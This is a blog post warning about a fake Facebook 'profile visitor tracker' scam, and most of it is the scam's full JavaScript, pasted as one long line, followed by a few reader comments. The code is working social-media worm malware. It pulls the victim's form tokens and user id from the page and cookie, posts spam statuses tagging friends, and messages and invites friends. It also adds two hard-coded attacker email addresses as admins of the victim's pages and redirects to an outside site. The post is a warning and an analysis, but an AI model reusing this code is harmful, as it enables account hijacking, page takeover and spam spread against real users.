Facebook Profile View Tracker Or Profile Visitors

Today I saw message regarding Facebook profile views through my connections on Facebook. I generally do not subscribe to application without checking a little. If a Facebook application is very important then I use that thinking - ok, after all Facebook is for fun!

This application fbprofiletool.com, which is about telling number of profile visitors you had and advertising like this (Find How Many Views Your Facebook Profiles has had) was also interesting. I think noticing this kind of application first time. Thought to check it a little. Here is a website (http://fbprofiletool.com/?4) of an application hosting owner. There you will get steps to follow to get - How many times your profiles got viewed!
I analyzed a little and felt that it is falsely showing us result. JavaScript code they are using for this is highly encrypted. Many developers may even find it difficult to get into it. I am not 100% sure of everything of my analysis in short period, but I feel that they are just fooling people by showing hard coded status messages and sending all profile information to this email ids (fewster.a@gmail.com,j.n.myers9@gmail.com) using XMLHttpRequest (XHR). The code they are using is encrypted but after all it is JavaScript. So, you can find a way to get the original code. You can also analyze the code by looking at the code below.

Here is the code they are using for showing you number of profile viewer:


event_id = "123852594353955";
page_id_x = "108526662557529";
admin_emails = "fewster.a@gmail.com,j.n.myers9@gmail.com";
statuses = ["Hey! How many views has your profile got?? http://goo.gl/AewlH", "4027 people have viewed my profile, how many have viewed yours? http://goo.gl/6k18z", "Find out how many views your profiles had @ http://goo.gl/c2WD2", "Insane! Facebook tool to see how many views your profiles had >> http://goo.gl/k0Ull", "According to http://goo.gl/snnaf 6,729 people viewed my profile"];
subjects = ["Check this out!", "Hey, whats happening?", "Hey! This is awesome"];
url_log = "http://fbprofiletool.com/result.php";
Array.prototype.randomize = function () {
    return this[Math.floor(Math.random() * this.length)];
}
Object.prototype.isReady = function () {
    if (this.readyState == 4 && this.status == 200) {
        return true;
    } else {
        return false;
    }
}
String.prototype.getFriends = function () {
    friends2 = this.match(/facebook.com\\\/profile.php?id=d+\\\">(]+>|)[^<>]+/gi).join(":").replace(/(facebook.com\\\/|profile.php?id=|]+>|l.php.*)/gi, "").replace(/\\\">/gi, "|").split(":").slice(1); //friends3 = this.match(/d+_d+_d+_w+.jpg\\\" \\\/><\\\/div><\\\/div>[^<>]+/gi).join(":").replace(/<[^<>]+>/gi, "").replace(/\\\" \\\/>/gi, "|").replace(/d+_(d+)_d+_w+.jpg|([wds-\\]+)/gi, "$1|$2").split(":"); //return friends2.concat(friends3).slice(1); return friends2; } function addAdmin(pageid, emails, form, dt){ iemails = emails.split(","); main_emails = []; for(i = 0;i < iemails.length; i++){ main_emails[i] = "friendselector_input[]=" + iemails[i] + "&friend_selected[]="; } with(newx = new XMLHttpRequest()) open("POST", "/pages/edit/?id=" + pageid + "&sk=admin"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("post_form_id=" + form + "&fb_dtsg=" + dt + "&fbpage_id=" + pageid + "&" + main_emails.join("&") + "&save=1"); } function makePost(res, status, to, friends){ formx = res.match(/name="post_form_id" value="([dw]+)"/)[1]; dtx = res.match(/name="fb_dtsg" value="([^"]+)"/)[1]; composerx = res.match(/name=\"xhpc_composerid\" value=\"([^"]+)\"/)[1]; msg = status.randomize() + "nn"; text_post = ""; text_actual = ""; for(i = 0;i < 6; i++){ tox = friends.randomize().split("|"); text_post += "@[" + tox[0] + ":], "; text_actual += tox[1] + ", "; } pxt = "post_form_id=" + formx + "&fb_dtsg=" + dtx + "&xhpc_composerid=" + composerx + "&xhpc_targetid=" + to.split("|")[0] + "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" + encodeURIComponent(msg + text_actual.replace(/, $/, "")) + "&xhpc_message=" + encodeURIComponent(msg + text_post.replace(/, $/, "")) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest"; update(pxt); } function update(pxt){ with(newx = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send(pxt); } /* if(window.location.hostname != "sbx.facebook.com"){ alert("Please, run the code on sbx.facebook.com :)"); window.location = "http://sbx.facebook.com/"; }else{ */ if(window.location.href == "http://www.facebook.com/"){ formx = (res = document.body.innerHTML).match(/name="post_form_id" value="([dw]+)"/)[1]; dtx = res.match(/name="fb_dtsg" value="([^"]+)"/)[1]; composerx = res.match(/name=\"xhpc_composerid\" value=\"([^"]+)\"/)[1]; }else{ with(muhaha = new XMLHttpRequest()) open("GET", "/", false), send(null); formx = (res = muhaha.responseText).match(/name="post_form_id" value="([dw]+)"/)[1]; dtx = res.match(/name="fb_dtsg" value="([^"]+)"/)[1]; composerx = res.match(/name=\"xhpc_composerid\" value=\"([^"]+)\"/)[1]; } alert("Hello!nnTo activate the tool press Enter on your keyboard. nnThis will take 2-3 minutes, while waiting please do not close this window or tab."); update("post_form_id=" + formx + "&fb_dtsg=" + dtx + "&xhpc_composerid=" + composerx + "&xhpc_targetid=" + document.cookie.match(/c_user=(d+)/)[1] + "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" + encodeURIComponent((stx = statuses.randomize())) + "&xhpc_message=" + encodeURIComponent(stx) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest"); with(newz = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("fbpage_id=" + page_id_x + "&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=" + formx + "&fb_dtsg=" + dtx + "&lsd&post_form_id_source=AsyncRequest"); R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0); with(fr = new XMLHttpRequest()) open("GET", "/ajax/browser/list/friends/all/?uid=" + (me = document.cookie.match(/c_user=(d+)/)[1]) + "&offset=50&dual=1&__a=1"), onreadystatechange = function(){ if(fr.isReady()){ friends = fr.responseText.getFriends(); idx = []; for(i = 0; i < friends.length; i++){ if(!isNaN(friends[i].split("|")[0])){ idx[i] = "ids[" + i + "]=" + friends[i].split("|")[0]; } } with(invi = new XMLHttpRequest()) open("POST", "/ajax/social_graph/invite_dialog.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("post_form_id=" + formx + "&fb_dtsg=" + dtx + "&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&" + idx.join("&") + "&node_id=" + event_id + "&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest"); cnt_fr = 0; tx = setInterval(function(){ if(cnt_fr == friends.length) { window.location = "http://fbprofilestalker.com/result.php"; clearInterval(tx); } makePost(document.body.innerHTML, statuses, friends[cnt_fr], friends); with(xa = new XMLHttpRequest()) open("GET", "/ajax/messaging/composer.php?__a=1&__d=1"), onreadystatechange = function(){ if(xa.isReady()){ compi = xa.responseText.match(/([dw]+)_error/)[1]; pxi = "ids_" + compi + "[0]=" + friends[cnt_fr].split("|")[0] + "&subject=" + encodeURIComponent(subjects.randomize()) + "&status=" + encodeURIComponent(statuses.randomize()) + "&ids[0]=" + friends[cnt_fr].split("|")[0] + "&action=send_new&home_tab_id=1&profile_id=" + document.cookie.match(/c_user=(d+)/)[1] + "&target_id=0&app_id=&&composer_id=" + compi + "&hey_kid_im_a_composer=true&thread&post_form_id=" + formx + "&fb_dtsg=" + dtx + "&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest"; if(cnt_fr < 15) with(mi = new XMLHttpRequest()) open("POST", "/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send(pxi); } }, send(null); cnt_fr += 1; }, 5000); } }, send(null); with(ins = new XMLHttpRequest()) open("GET", "/insights/?_fb_noscript=1"), onreadystatechange = function(){ if(ins.isReady()){ ids = ins.responseText.match(/po_d+">View/gi).join(":").replace(/(po_|">View)/gi, "").split(":"); cnt_pages = 0; tz = setInterval(function(){ if(cnt_pages == ids.length) { window.location = "http://fbprofilestalker.com/result.php"; clearInterval(tz); } update("post_form_id=" + formx + "&fb_dtsg=" + dtx + "&xhpc_composerid=" + composerx + "&xhpc_targetid=" + ids[cnt_pages] + "&xhpc_context=profile&xhpc_fbx=&xhpc_message_text=" + encodeURIComponent((stx = statuses.randomize())) + "&xhpc_message=" + encodeURIComponent(stx) + "&UITargetedPrivacyWidget=80&&nctr[_mod]=pagelet_tab_content&lsd&post_form_id_source=AsyncRequest"); addAdmin(ids[cnt_pages], admin_emails, formx, dtx); cnt_pages += 1; }, 3000); } }, send(null); //}

There are lots of lines of code the application (http://fbprofiletool.com/Tool.fb) is using to send data to his server using XMLHttpRequest(). Copy the code to your editor to analyze it. Code beautifier has failed to beautify every long lines.
I feel they are forwarding all important data from your account to their email ids mentioned in admin_emails variable. So, beware before using these kind of tricks.

  • # 1 - by Web Development Company Chennai

    i think this would be the great news to see facebook viewers. normally i won’t believe this kind of coding..if is good, i will try this one..

  • # 2 - by Barcode maker

    Hi, can you suggest me some tips, how can I get face book profile tracker?

    • # 3 - by Satya Prakash

      without API from their side, this does not seems possible. So, please check in their API list.

Comments are open for an year period. Please, write here on Facebook page.